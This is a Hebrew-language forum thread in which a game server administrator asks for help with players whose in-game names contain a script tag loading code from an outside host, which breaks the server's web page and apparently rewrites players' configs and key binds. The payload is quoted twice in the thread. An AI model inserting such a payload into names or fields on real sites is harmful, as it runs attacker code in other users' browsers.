![]() |
בעיה בשרתי משחק
שלום ..
לאחרונה יש אנשים שמסתובבים השמות האלו <script/src=//t.zc.cx></scri בשרתים ופשוט מנשים לכולם את השמות :\ יש לכם אולי פתרון ? |
לא הבנתי.
אם אתה רוצה להעיף אותםצ פשוט תעשה: vote בקונסול. לכל אחד יש ID משלו למשל: admin_kick 55 |
לא הבנת כי לא נתקלת בהם :\
מה הקשר להעיף ? יש באג חדש .. הוא משבש את העמוד הראשי של הוואב מוד ובמשחק משנה לאנשים את השמות .. עריכה : זה נכנס לקונפיג של האנשים ברגע שהם נכנסים לשרת ומדביק להם לשמל אם הם ילחצו על הבינד 1 / 2 / 3 / כול מיני כאלו זה ישנה להם את השמות בדרך, זה משבש את האתר . |
מה שאתה אומר בעצם שאלו אנשים שאין להם כלל גישות לשרת והם יכולים באיזה סקריפט מסויים לשנות קונפיגים לאנשים?
אם הבנתי אותך תגיד, אם אתה יכול להראות לי כדי אולי לנסות לפענח את הבעיה אתה מוזמן. |
http://212.150.123.11:20012/index.w
זה לדוגמא שרת שיש בו כרגע את השם של הסקריפט .. הוא משבש את האתר :\ ובמשחק זה כנראה מכניס לאנשים לקונפיג שברגע שהם ילחצו על מקש מסויים זה ישנה להם את השם :\ הבעיה שאני משנה להם את השם במשחק הם לוחצים על המקש וזה משנה להם שוב :\ |
לא התעמקתי בפיתרון אבל יש פיתרון פשוט ביותר
תוסיף את הכינוי לדף של האדמינים ככה שהשם שמור לאדמין והופה סודר <script/src=//t.zc.cx></script> ככה בדיוק |
הפתירון שלך שנוי במחלוקת :\
אנשים לא יבינו למה הם מקבלים קיקים / לא מצליחים להיכנס .. אהבתי את דרך החשיבה ש'ך חח |
עכשיו הבנתי..
אם זה היה שרת משחק מקורי אני חושב שכל הצרות האלו בכלל לא היו קורות לך :) |
ציטוט:
זה גם וגם :\ והיום יש כבר Lan 2 לידיעתך .. זה קורה גם במקורי, אם הייתי בודק היית יודע . |
ציטוט:
|
כל הזמנים הם GMT +2. הזמן כעת הוא 08:44. |
מופעל באמצעות VBulletin גרסה 3.8.6
כל הזכויות שמורות ©
כל הזכויות שמורות לסולל יבוא ורשתות (1997) בע"מ